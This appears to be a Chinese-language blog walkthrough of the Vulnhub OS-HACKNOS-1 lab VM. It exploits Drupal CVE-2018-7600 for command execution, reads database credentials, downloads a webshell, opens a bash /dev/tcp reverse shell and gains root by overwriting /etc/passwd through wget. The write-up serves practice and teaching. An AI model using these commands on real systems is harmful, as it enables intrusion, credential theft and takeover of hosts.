【Vulnhub】靶机OS-HACKNOS

admin
admin
admin
101021
文章
87
评论
2022年1月10日03:33:39评论78 views字数 3486阅读11分37秒阅读模式

前言

  • 第一次玩Vulnhub,只记录使用命令和一些感想,还有踩坑记录

Os-HackNos-1配置

首先介绍一下靶机靶机是 vulnhub Os-hackNos-1

简介: 难度容易到中, flag 两个 一个是普通用户的user.txt 另外一个是root用户的user.txt

靶机的地址:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

有的靶机可能打开无法获取IP,我们需要使用方法来进入到靶机内,修改信息。

1、导入到了虚拟机之后,会出现无法获取ip的情况,我们自己调,开启HackNos的同时连按shift键,按e进入页面

image-20210919160755067

3、将这里的ro修改为rw single init=/bin/bash,然后按ctrl+x,进入root操作页面

image-20210919160925088

4、查ip a发现查不到,记住网卡的名称ens33,准备修改配置信息

image-20210919161030226

5、vim /etc/network/interfaces 看一下配置信息用的是哪一个网卡,把这两个都改成 ens33

image-20210919161105212

6、然后/etc/init.d/networking restart 重启网卡服务 enp0s3

image-20210919161139706

7、最后按ctrl+alt+del,进行重启,就ok了

Os-HackNos-1开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
 
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
 
nmap -sV -sC -A 192.168.1.108

3、扫目录情况

1
2
3
 
gobuster dir -u http://192.168.1.108/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 

dirb http://10.0.2.4

4、根据下载drupal的cms来试着看其版本

1
 
http://192.168.1.108/drupal/CHANGELOG.txt

5、通过cms版本搜一下exp

1
2
 
CVE-2018-7600
git clone https://github.com/pimps/CVE-2018-7600

6、有一个远程REC利用exp拿下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
 
python3 drupa7-CVE-2018-7600.py http://192.168.1.108/drupal/ 
查看数据库
python3 drupa7-CVE-2018-7600.py http://192.168.1.108/drupal/ -c "cd sites/default;ls;cat settings.php"


获得
* Database configuration format:
 * @code
 *   $databases['default']['default'] = array(
 *     'driver' => 'mysql',
 *     'database' => 'databasename',
 *     'username' => 'username',
 *     'password' => 'password',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *   );
 *   $databases['default']['default'] = array(
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'username',
 *     'password' => 'password',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *   );
 *   $databases['default']['default'] = array(
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *   );
 * @endcode
 */
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'cuppa',
      'username' => 'cuppauser',
      'password' => 'Akrn@4514',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

也可以对其目录进行扫描

1
2
3
 
gobuster dir -u http://192.168.1.108/drupal -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

dirsearch -u 192.168.1.108 -e*  -x 403

7、利用python搭建服务器,让其下载木马,就可以上线webshell了

1
2
3
 
python -m SimpleHTTPServer 

python3 drupa7-CVE-2018-7600.py http://192.168.1.108/drupal/ -c "wget http://192.168.1.105:8000/gylq.php"

8、反弹shell

1
 
bash -c 'exec bash -i &>/dev/tcp/192.168.1.105/6666 0>&1'

9、解密得出james:Hacker@451

1
2
 
echo "KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==" | base64 -d
<T4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==" | base64 -d

10、suid提权

利用制作一个ssl密码

1
2
3
 
openssl passwd -1 -salt gylq 123456
输出
$1$gylq$/LTjhHmiHp0tpo66ocv2e/

将其更改为下列形式,用wget替换

1
 
gylq:$1$gylq$/LTjhHmiHp0tpo66ocv2e/:0:0:root:/root:/bin/bash
 
1
 
wget http://192.168.1.105:8000/passwd -O /etc/passwd

接着用su gylq来登陆就是root权限了

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Vulnhub】靶机OS-HACKNOShttp://cn-sec.com/archives/730024.html

发表评论

匿名网友 填写信息